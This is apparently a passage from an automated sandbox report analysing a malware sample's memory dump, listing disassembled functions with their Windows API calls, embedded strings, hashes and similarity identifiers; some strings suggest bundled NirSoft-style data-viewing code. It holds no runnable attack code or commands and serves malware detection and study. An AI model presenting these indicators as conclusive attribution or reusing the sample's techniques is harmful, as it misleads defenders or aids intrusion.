                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                • String ID: 4$h
                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                • String ID: A
                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy
                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 290601579-0
                                                                                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                • String ID: PD$PD
                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 239872665-3916222277
                                                                                                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID: ($d
                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
